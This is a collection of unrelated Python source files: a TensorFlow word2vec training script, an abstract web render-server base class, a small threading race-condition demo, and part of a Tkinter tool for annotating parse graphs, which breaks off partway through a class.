| source | python |
|---|---|
word2vec.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov et al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
FLAGS = flags.FLAGS
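# A usage sketch (not part of the original file; the /tmp paths are assumptions):
# with the text8 corpus and the questions-words.txt analogy file mentioned in the
# flag help strings above downloaded locally, the script can be launched roughly as:
#
#   python word2vec.py \
#     --train_data=/tmp/text8 \
#     --eval_data=/tmp/questions-words.txt \
#     --save_path=/tmp/word2vec_logs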
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
# We replicate sampled noise labels for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
return nce_loss_tensor
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vector on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the constructed graph that training and
# evaluation use to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
time.sleep(opts.statistics_interval)  # Report progress once in a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
base.py
|
import abc
from threading import Event, Thread
from typing import Any, Dict, Generic, Optional, Tuple, TypeVar
from idom.core.component import ComponentConstructor
_App = TypeVar("_App", bound=Any)
_Config = TypeVar("_Config", bound=Any)
_Self = TypeVar("_Self", bound="AbstractRenderServer[Any, Any]")
class AbstractRenderServer(Generic[_App, _Config], abc.ABC):
"""Base class for all IDOM server application and extension implementations.
It is assumed that IDOM will be used in conjunction with some async-enabled server
library (e.g. ``sanic`` or ``tornado``) so these server implementations should work
standalone and as an extension to an existing application.
Standalone usage:
:meth:`AbstractRenderServer.run` or :meth:`AbstractRenderServer.daemon`
Register an extension:
:meth:`AbstractRenderServer.register`
"""
def __init__(
self,
constructor: ComponentConstructor,
config: Optional[_Config] = None,
) -> None:
self._app: Optional[_App] = None
self._root_component_constructor = constructor
self._daemon_thread: Optional[Thread] = None
self._config = self._create_config(config)
self._server_did_start = Event()
@property
def application(self) -> _App:
if self._app is None:
raise RuntimeError("No application registered.")
return self._app
def run(self, host: str, port: int, *args: Any, **kwargs: Any) -> None:
"""Run as a standalone application."""
if self._app is None:
app = self._default_application(self._config)
self.register(app)
else: # pragma: no cover
app = self._app
if self._daemon_thread is None: # pragma: no cover
return self._run_application(self._config, app, host, port, args, kwargs)
else:
return self._run_application_in_thread(
self._config, app, host, port, args, kwargs
)
def daemon(self, *args: Any, **kwargs: Any) -> Thread:
"""Run the standalone application in a seperate thread."""
self._daemon_thread = thread = Thread(
target=lambda: self.run(*args, **kwargs), daemon=True
)
thread.start()
self.wait_until_server_start()
return thread
def register(self: _Self, app: Optional[_App]) -> _Self:
"""Register this as an extension."""
self._setup_application(self._config, app)
self._setup_application_did_start_event(
self._config, app, self._server_did_start
)
self._app = app
return self
def wait_until_server_start(self, timeout: float = 3.0) -> None:
"""Block until the underlying application has started"""
if not self._server_did_start.wait(timeout=timeout):
raise RuntimeError( # pragma: no cover
f"Server did not start within {timeout} seconds"
)
@abc.abstractmethod
def stop(self) -> None:
"""Stop a currently running application"""
@abc.abstractmethod
def _create_config(self, config: Optional[_Config]) -> _Config:
"""Return the default configuration options."""
@abc.abstractmethod
def _default_application(self, config: _Config) -> _App:
"""If used standalone this should return an application."""
raise NotImplementedError()
@abc.abstractmethod
def _setup_application(self, config: _Config, app: _App) -> None:
"""General application setup - add routes, templates, static resource, etc."""
raise NotImplementedError()
@abc.abstractmethod
def _setup_application_did_start_event(
self, config: _Config, app: _App, event: Event
) -> None:
"""Register a callback to the app indicating whether the server has started"""
raise NotImplementedError()
@abc.abstractmethod
def _run_application(
self,
config: _Config,
app: _App,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
"""Run the application in the main thread"""
raise NotImplementedError()
@abc.abstractmethod
def _run_application_in_thread(
self,
config: _Config,
app: _App,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
"""This function has been called inside a daemon thread to run the application"""
raise NotImplementedError()
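# --- Illustrative sketch (not part of idom) ---------------------------------------
# A minimal, self-contained example of what a concrete backend could look like.
# ``_DummyApp`` and ``ExampleRenderServer`` are invented names for illustration only;
# real backends wrap an actual async server library such as sanic or tornado.


class _DummyApp:
    """Stands in for a real server framework's application object."""

    def serve(self, host: str, port: int) -> None:
        print(f"pretending to serve on {host}:{port}")


class ExampleRenderServer(AbstractRenderServer[_DummyApp, Dict[str, Any]]):
    def stop(self) -> None:
        pass  # a real backend would tell its event loop to shut down

    def _create_config(self, config: Optional[Dict[str, Any]]) -> Dict[str, Any]:
        return {"url_prefix": "/_idom", **(config or {})}

    def _default_application(self, config: Dict[str, Any]) -> _DummyApp:
        return _DummyApp()

    def _setup_application(self, config: Dict[str, Any], app: _DummyApp) -> None:
        pass  # a real backend would register routes, templates, static files, ...

    def _setup_application_did_start_event(
        self, config: Dict[str, Any], app: _DummyApp, event: Event
    ) -> None:
        event.set()  # a real backend would call this from a startup callback

    def _run_application(self, config, app, host, port, args, kwargs) -> None:
        app.serve(host, port)

    def _run_application_in_thread(self, config, app, host, port, args, kwargs) -> None:
        app.serve(host, port)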
|
example1.py
|
import threading
import random
import time
def update():
global counter
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1 # updating shared resource
counter = 0
threads = [threading.Thread(target=update) for _ in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f'Final counter: {counter}.')
print('Finished.')
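# Hedged follow-up sketch (not in the original example): the lost updates above come
# from the unguarded read-modify-write of ``counter``. One fix is to serialize only
# the critical section with a lock; ``counter_lock`` and ``safe_update`` are names
# introduced purely for this illustration.

counter_lock = threading.Lock()

def safe_update():
    global counter
    time.sleep(random.randint(0, 1))  # simulated heavy work stays outside the lock
    with counter_lock:                # only the increment is serialized
        counter += 1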
|
annotator.py
|
# TODO: Add this as an entry point in setup.py, so it can be run directly.
"""Tkinter-based app for annotating samples."""
import bz2
import dbm
import json
import threading
import time
import traceback
from io import BytesIO
from tkinter import Tk, Canvas, Text, END, Scrollbar, VERTICAL, HORIZONTAL, Frame, Label, Button, \
Checkbutton, IntVar, TclError
from tkinter.ttk import Separator, Combobox
from typing import Union, Tuple, Optional, Dict, List, Sequence
import PIL.Image
from PIL.ImageTk import PhotoImage
from pyramids.model import Model
try:
from graphviz import Digraph
except ImportError:
Digraph = None
from pyramids.categorization import Category, Property
from pyramids.graphs import ParseGraph, BuildGraph
from pyramids.parsing import Parser
MM_PER_INCH = 25.4
# Flow:
# * Select an existing or new annotation set:
# * New:
# * Choose save path
# * Choose parser model
# * Existing:
# * Choose load path
# * Create/resume annotation task: (annotation tasks are attached to specific annotation sets)
# * New:
# * Choose name
# * Choose utterance list
# * Resume:
# * Choose name
# * Switch to the annotation window and proceed to annotate samples
# * Annotations are auto-saved as they are modified
# Menu layout:
# * File:
# * New annotation set
# * Open annotation set
# * New utterance list
# * Edit utterance list
# * Export annotations (save to alternative formats, e.g. tab-delimited)
# * Edit:
# * Undo (bound to Ctrl-Z)
# * Redo (bound to Shift-Ctrl-Z)
# * View: (only in annotation window)
# * Stats (parser accuracy, annotation completion, etc. on the annotation set, broken out by
# utterance list)
# * Toggle show/hide parse visualization
# * Task:
# * New annotation task (annotation set to add to, and utterance list to add from)
# * Resume annotation task
# * Delete annotation task
# * Settings: (only in annotation window)
# * Parser timeout
# * Restriction category
# * Utterance ordering (original, random, shortest/longest first, alphabetical, parser
# uncertainty-sorted)
# * Utterance filtering
# * Parser:
# * Train (entire annotation set or particular utterance list)
# * Evaluate (entire annotation set or particular utterance list)
# Utterance list window layout:
# * Menu
# * Header:
# * Current utterance list
# * Utterance list stats
# * Add utterance area:
# * Utterance text box (sorts utterance listing to put nearest matches at top as utterance
# is typed)
# * Add button (bound to <Return>)
# * Clear button (bound to <Escape>)
# * Body:
# * Utterance listing:
# * Utterance
# * Edit button
# * Remove button
# * Footer:
# * Page navigation (first, prev, next, last)
# Annotation window layout:
# * Menu
# * Header:
# * Current annotation set
# * Current utterance list
# * Current utterance
# * Current utterance with injected links & parens
# * Left panel:
# * Category name (drop-down)
# * Property selection (checkboxes)
# * Token listing:
# * Token spelling
# * Token index
# * Outbound link listing:
# * Link label (drop-down)
# * Link sink token (drop-down)
# * Delete button
# * New link button
# * Right panel:
# * Tree visualization (optional, depending on whether graphviz is installed & view is
# enabled)
# * Footer:
# * Reset (clears manual annotations and re-queries the model)
# * Accept/reject
# * Utterance list navigation (first, prev, next, last, new)
class ReadoutFrame(Frame):
def __init__(self, parent, labels, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.labels = []
self.boxes = []
self.mapping = {}
self.columnconfigure(1, weight=1)
for row, label_text in enumerate(labels):
assert label_text not in self.mapping
label = Label(self, text=label_text + ':')
label.grid(row=row, column=0, sticky='ne')
self.labels.append(label)
box = Text(self, state='disabled', height=1)
box.grid(row=row, column=1, sticky='new')
self.boxes.append(box)
self.mapping[label_text] = row
def set(self, label, value):
box = self.boxes[self.mapping[label]]
if value is None:
text = ''
else:
text = str(value)
box['state'] = 'normal'
box.delete(1.0, END)
box.insert(END, text)
box['state'] = 'disabled'
box['width'] = len(text)
def get(self, label):
box = self.boxes[self.mapping[label]]
return box.get(1.0, END).rstrip('\n')
def clear(self, label=None):
if label is None:
for box in self.boxes:
box.delete(1.0, END)
else:
box = self.boxes[self.mapping[label]]
box.delete(1.0, END)
class TokenEditingFrame(Frame):
def __init__(self, parent, model: Model, graph: BuildGraph, *args, graph_change_callback=None,
**kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self.graph = graph
self.link_types = sorted(str(label) for label in self.model.link_types)
self.graph_change_callback = graph_change_callback
self.token_listing = ['%s [%s]' % (token.spelling, index)
for index, token in enumerate(graph.tokens)]
assert len(self.token_listing) == len(graph.tokens)
self.token_labels = [Label(self, text='%s [%s]' % (token.spelling, index))
for index, token in enumerate(graph.tokens)]
assert len(self.token_labels) == len(graph.tokens)
self.separators = [Separator(self, orient=HORIZONTAL) for _ in graph.tokens]
assert len(self.separators) == len(graph.tokens)
link_sets = []
for source in range(len(graph.tokens)):
link_set = set()
for sink in graph.get_sinks(source):
for label in graph.get_labels(source, sink):
link_set.add((str(label), sink))
link_sets.append(link_set)
assert len(link_sets) == len(graph.tokens)
self.link_selector_maps = [] # type: List[Dict[Tuple[Optional[Property], int], Tuple]]
for source, link_set in enumerate(link_sets):
link_selector_map = {}
for label, sink in link_set:
label_drop_down = Combobox(self, values=self.link_types)
label_drop_down.current(self.link_types.index(label))
label_drop_down.bind("<<ComboboxSelected>>",
(lambda *a, r=(source, label, sink), v=label_drop_down, **k:
self.modify_link(r, label=v.get())))
sink_drop_down = Combobox(self, values=self.token_listing)
sink_drop_down.current(sink)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, label, sink), v=sink_drop_down, **k:
self.modify_link(r, sink=self.token_listing.index(v.get()))))
remove_button = Button(self, text='-',
command=lambda r=(source, label, sink): self.modify_link(r))
link_selector_map[label, sink] = label_drop_down, sink_drop_down, remove_button
self.link_selector_maps.append(link_selector_map)
assert len(self.link_selector_maps) == len(graph.tokens)
self.new_link_selectors = [] # type: List[Tuple[Combobox, Combobox]]
for source in range(len(self.graph.tokens)):
label_drop_down = Combobox(self, values=[''] + self.link_types)
label_drop_down.current(0)
label_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, None, None): self.modify_link(r, new=True)))
sink_drop_down = Combobox(self, values=[''] + self.token_listing)
sink_drop_down.current(0)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, None, None): self.modify_link(r, new=True)))
self.new_link_selectors.append((label_drop_down, sink_drop_down))
def modify_link(self, link, *, source=None, label=None, sink=None, new=False):
old_source, old_label, old_sink = link
assert old_source is not None
if new:
assert old_label is None
assert old_sink is None
assert source is None
assert sink is None
assert label is None
assert 0 <= old_source < len(self.new_link_selectors)
label_drop_down, sink_drop_down = self.new_link_selectors[old_source]
label = label_drop_down.get() or None
sink_index = sink_drop_down.current()
if sink_index > 0:
sink = sink_index - 1
else:
sink = None
if label is not None and sink is not None:
label_drop_down.current(0)
sink_drop_down.current(0)
label_drop_down.selection_clear()
sink_drop_down.selection_clear()
else:
assert old_sink is not None
assert old_label is not None
self.graph.remove_link(old_source, old_label, old_sink)
items = self.link_selector_maps[old_source].pop((old_label, old_sink))
for item in items:
if hasattr(item, 'destroy'):
item.destroy()
if source is not None or label is not None or sink is not None:
if source is None:
source = old_source
if label is None:
label = old_label
if sink is None:
sink = old_sink
assert source is not None
if sink is not None and label is not None:
if label not in self.link_types:
self.link_types.append(label)
label_drop_down = Combobox(self, values=self.link_types)
label_drop_down.current(self.link_types.index(label))
label_drop_down.bind("<<ComboboxSelected>>",
(lambda *a, r=(source, label, sink), v=label_drop_down, **k:
self.modify_link(r, label=v.get())))
sink_drop_down = Combobox(self, values=self.token_listing)
sink_drop_down.current(sink)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, label, sink), v=sink_drop_down, **k:
self.modify_link(r, sink=v.current())))
remove_button = Button(self, text='-',
command=lambda r=(source, label, sink): self.modify_link(r))
self.graph.add_link(source, label, sink)
self.link_selector_maps[source][label, sink] = (label_drop_down, sink_drop_down,
remove_button)
if new or source is None:
self.refresh()
if self.graph_change_callback:
self.graph_change_callback()
def refresh(self):
current_row = 0
for token_index in range(len(self.graph.tokens)):
self.separators[token_index].grid(row=current_row, column=0, columnspan=5, sticky='wen')
current_row += 1
self.token_labels[token_index].grid(row=current_row, column=0, sticky='wn')
# self.add_buttons[token_index].grid(row=current_row, column=1, sticky='nwe')
for label, sink in sorted(self.link_selector_maps[token_index],
key=lambda l: (l[1], l[0])):
entry = self.link_selector_maps[token_index][label, sink]
label_drop_down, sink_drop_down, remove_button = entry
label_drop_down.grid(row=current_row, column=2, sticky='nwe')
sink_drop_down.grid(row=current_row, column=3, sticky='nwe')
remove_button.grid(row=current_row, column=4, sticky='nwe')
current_row += 1
label_drop_down, sink_drop_down = self.new_link_selectors[token_index]
label_drop_down.grid(row=current_row, column=2, sticky='nwe')
sink_drop_down.grid(row=current_row, column=3, sticky='nwe')
current_row += 1
if not self.link_selector_maps[token_index]:
current_row += 1
class ScrollableFrame(Frame):
def __init__(self, parent, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas = Canvas(self)
self.inner_frame = Frame(self.canvas)
self.vertical_scrollbar = Scrollbar(self, orient=VERTICAL, command=self.canvas.yview)
self.horizontal_scrollbar = Scrollbar(self, orient=HORIZONTAL, command=self.canvas.xview)
self.canvas.configure(yscrollcommand=self.vertical_scrollbar.set,
xscrollcommand=self.horizontal_scrollbar.set)
self.canvas.grid(row=0, column=0, sticky='news')
self.vertical_scrollbar.grid(row=0, column=1, sticky='ns')
self.horizontal_scrollbar.grid(row=1, column=0, sticky='we')
self.canvas.create_window((4, 4), window=self.inner_frame, anchor='nw')
self.inner_frame.bind("<Configure>", self._on_frame_configure)
# noinspection PyUnusedLocal
def _on_frame_configure(self, event):
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
class GraphEditingFrame(Frame):
def __init__(self, parent, model, *args, graph_change_callback=None, **kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self._graph = BuildGraph()
self.category = model.default_restriction
self.graph_change_callback = graph_change_callback
self.rowconfigure(2, weight=1)
self.columnconfigure(0, weight=1)
self.category_frame = Frame(self)
self.category_frame.grid(row=0, column=0, sticky='wen')
self.property_frame = Frame(self)
self.property_frame.grid(row=1, column=0, sticky='wen')
self.scrollable_tef_container = ScrollableFrame(self)
self.scrollable_tef_container.grid(row=2, column=0, sticky='wens')
self.scrollable_tef_container.inner_frame.rowconfigure(0, weight=1)
